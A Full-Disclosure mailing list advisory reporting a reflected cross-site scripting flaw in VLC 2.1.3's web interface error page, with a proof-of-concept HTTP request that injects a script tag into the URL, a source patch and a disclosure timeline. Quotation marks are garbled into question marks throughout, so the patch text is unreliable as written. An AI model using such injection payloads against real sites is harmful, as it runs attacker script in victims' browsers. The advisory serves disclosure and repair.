Mailing List Archive

[Quantum Leap Advisory] #QLA140216 - VLC Reflected XSS vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=== Details ===
Advisory: http://www.quantumleap.it/vlc-reflected-xss-vulnerability/
Affected Product: VLC
Version: 2.1.3 (older versions may be affected too)

=== Executive Summary ===
Using a specially crafted HTTP request, it is possible to exploit a lack
in the neutralization[1] of the error pages output which includes the
user submitted content. Successful exploitation of the vulnerabilities,
results in the execution of arbitrary HTML and script code in user?s
browser in context of the vulnerable website trough a ?Reflected XSS?

=== Proof of Concept ===
It has been discovered a reflected XSS vulnerability on error page in
VLC Web Interface. The function ?httpd_HtmlError? in file
?src/network/httpd.c? doesn?t sanitize the ?url? parameter, so an XSS
attack can be executed. Below you can find a proof of concept of the
vulnerability:

GET /te<script>alert(?XSS?);</script>st HTTP/1.1
Host: 192.168.1.101:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic OmNpYW8=
Connection: keep-alive

=== Solution ===
To quickly fix the security issue, in our Customer?s environment, we
wrote the following small patch:

<patch>
? httpd.c 2014-02-14 15:24:55.393978968 +0100
+++ httpd.patched.c 2014-02-14 15:24:44.404625054 +0100
@@ -256,9 +256,12 @@ static const char *httpd_ReasonFromCode(static
size_t httpd_HtmlError (char **body, int code, const char *url)
{
+ char *url_Encoded = NULL;
const char *errname = httpd_ReasonFromCode (code);
assert (errname != NULL);+ url_Encoded = convert_xml_special_chars
(url ? url : ??);
+
int res = asprintf (body,
?<?xml version=?1.0? encoding=?ascii? ?>n?
?<!DOCTYPE html PUBLIC ?-//W3C//DTD XHTML 1.0 Strict//EN?"
@@ -273,7 +276,9 @@ static size_t httpd_HtmlError (char **bo
?<a href=?http://www.videolan.org?>VideoLAN</a>n?
?</body>n?
?</html>n?, errname, code, errname,
- - (url ? ? (? : ??), (url ? url : ??), (url ? ?)? : ??));
+ (url_Encoded ? ? (? : ??), (url_Encoded ? url_Encoded : ??),
(url_Encoded ? ?)? : ??));
+
+ free (url_Encoded);if (res == -1)
{
</patch>

This patch has been merged with the Main Line of the VLC GIT
repository[2], it will be officially released in the build 2.2.0

=== Disclosoure Timeline ===

2013-12-02 ? Vulnerability Discovered
2014-02-15 ? Initial vendor notification
2014-02-20 ? The vendor fixed the vulnerability
2014-03-18 ? Public advisory

=== Discovered by ===
Vulnerability discovered by Francesco Perna and Pietro Minniti of
Quantum Leap s.r.l

=== References ===
[1]
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
[2]
http://git.videolan.org/?p=vlc.git;a=commit;h=fe5063ec5ad1873039ea719eb1f137c8f3bda84b

- --
Francesco Perna
Quantum Leap SRL
Sede Legale: Via Colle Scorrano n.5 65100 Pescara (PE)
Sede Operativa: Circonvallazione Cornelia n. 125, 00165 Roma (RM)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.17 (MingW32)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEbBAEBAgAGBQJTKD4tAAoJEPBLO12s/SuDhEMH+K7vy+JqXc47ADWCmyokJ3Bu
8VOZOH9lxt2wyHOD5tlf4tIQv6vQ2adGuSps16OIHRJ0KZ32PSJmBogHtPAsXFwP
i8ubs7Co6lNVwbfLGz5TQkZw+lfudUJ3VEaEHRtxEEao2mb7YcafmRFMV+rsdB+E
mgXdMy85G9tU/TDwi0//KBXCXmSFAHlEsaVlNVhqAUz3Eyg4hk9jOjaDat7ESt5Y
yfd3uSO2yWthI6gJH2cLI5Y1R1L5zr4/raxM44/lZHm+XFOviiiX2L/NNpedwnn6
Ax8y38AvQ8gFYvDtY+0tP4vBRrRAwzvGIZgSKdmeNMK+CpUvr+hZX53zVpTCPA==
=sPV+
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/